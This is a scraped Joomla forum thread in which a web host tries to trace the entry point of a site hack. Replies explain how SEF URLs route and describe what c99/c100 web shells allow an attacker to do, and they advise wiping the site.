Question 1, can I find logs in joomla too? I'm not expert in Joomla, have been studying about 2 months. Just started to learn the code in it.
I checked the basic folders.
Question 2 (I still reading and watching the material you linked) The hacked website was using SEF, even with this can be use the injection on the url?
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
To the best of my understanding
SEF url's are are 'symbolic' links that are routed to the normal links.
eg
If you have SEF from a menu item of
www.yoursite.com/search-site.html
then
http://www.yoursite.com/index.php?optio ... iew=search
will still reach the search page
http://www.yoursite.com/index.php?optio ... iew=search is a great way to search a 1.5 even when there is no menu item. So if you don't put a search button on a site because you don't want Search. Then go to Extensions >>> install/uninstall ... Components ... The just 'toggle' the green tick next to the Search module.
SEF url's are are 'symbolic' links that are routed to the normal links.
eg
If you have SEF from a menu item of
www.yoursite.com/search-site.html
then
http://www.yoursite.com/index.php?optio ... iew=search
will still reach the search page
http://www.yoursite.com/index.php?optio ... iew=search is a great way to search a 1.5 even when there is no menu item. So if you don't put a search button on a site because you don't want Search. Then go to Extensions >>> install/uninstall ... Components ... The just 'toggle' the green tick next to the Search module.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Just to update this thread.
We did a few security measures on our server and we deleted the website, whole thing, to make sure we have found some malicious files in the server.
Now we upload the website, with the hack scritps and start to monitoring the entries. Hope to find the weak before we ask to the webmaster upload a really clean version.
btw, we found some files that lead us to c100 shell.
We did a few security measures on our server and we deleted the website, whole thing, to make sure we have found some malicious files in the server.
Now we upload the website, with the hack scritps and start to monitoring the entries. Hope to find the weak before we ask to the webmaster upload a really clean version.
btw, we found some files that lead us to c100 shell.
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Finding the entry point of the hack
c99, c57, c100, and other variants are all server root kit shells.
They enable the hacker in most cases to browse the entire server without any passwords required as if it were a hard drive on his computer. This means the hacker can do whatever he wants to anything on the server, as well as anything to any domain, or any software (Joomla, wordpress etc.) installed on any domain. This includes installing backdoors to the server, installing additional malware/root kits etc.
By having or leaving the c100 or any variants on the domain you are never going to fix the hack and you are risking further infection of the server, if the server has not already been rooted.
Log files are mostly useless if the person knows how to use the shell as the times and entries can be altered.
I would suggest you wipe your site and start over following checklist 7 and inform your host of the found shell script(s).
They enable the hacker in most cases to browse the entire server without any passwords required as if it were a hard drive on his computer. This means the hacker can do whatever he wants to anything on the server, as well as anything to any domain, or any software (Joomla, wordpress etc.) installed on any domain. This includes installing backdoors to the server, installing additional malware/root kits etc.
By having or leaving the c100 or any variants on the domain you are never going to fix the hack and you are risking further infection of the server, if the server has not already been rooted.
Log files are mostly useless if the person knows how to use the shell as the times and entries can be altered.
I would suggest you wipe your site and start over following checklist 7 and inform your host of the found shell script(s).
PhilD
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Hi Phil,
Thanks for the info, you said a few things I wasnt aware, still studing what happing. Btw, this forum, this thread and the people who replied help me a lot.
But we are the host, this is the first time we face this. We are trying to learn to prevent in the future.
In my case, I really want to know the entry point in the joomla.
We found a lot of "alien" files in the server and my co worker deleted and tried to fix all the doors he found.
A question to you. If we clean what we have in the server now and we put the website with the alien script on it what could happen? Fail tentatives to get in again? or a door open?
Or to start the whole thing again the hacker has to do the injection attack again and so on?
Thanks for the info, you said a few things I wasnt aware, still studing what happing. Btw, this forum, this thread and the people who replied help me a lot.
But we are the host, this is the first time we face this. We are trying to learn to prevent in the future.
In my case, I really want to know the entry point in the joomla.
We found a lot of "alien" files in the server and my co worker deleted and tried to fix all the doors he found.
A question to you. If we clean what we have in the server now and we put the website with the alien script on it what could happen? Fail tentatives to get in again? or a door open?
Or to start the whole thing again the hacker has to do the injection attack again and so on?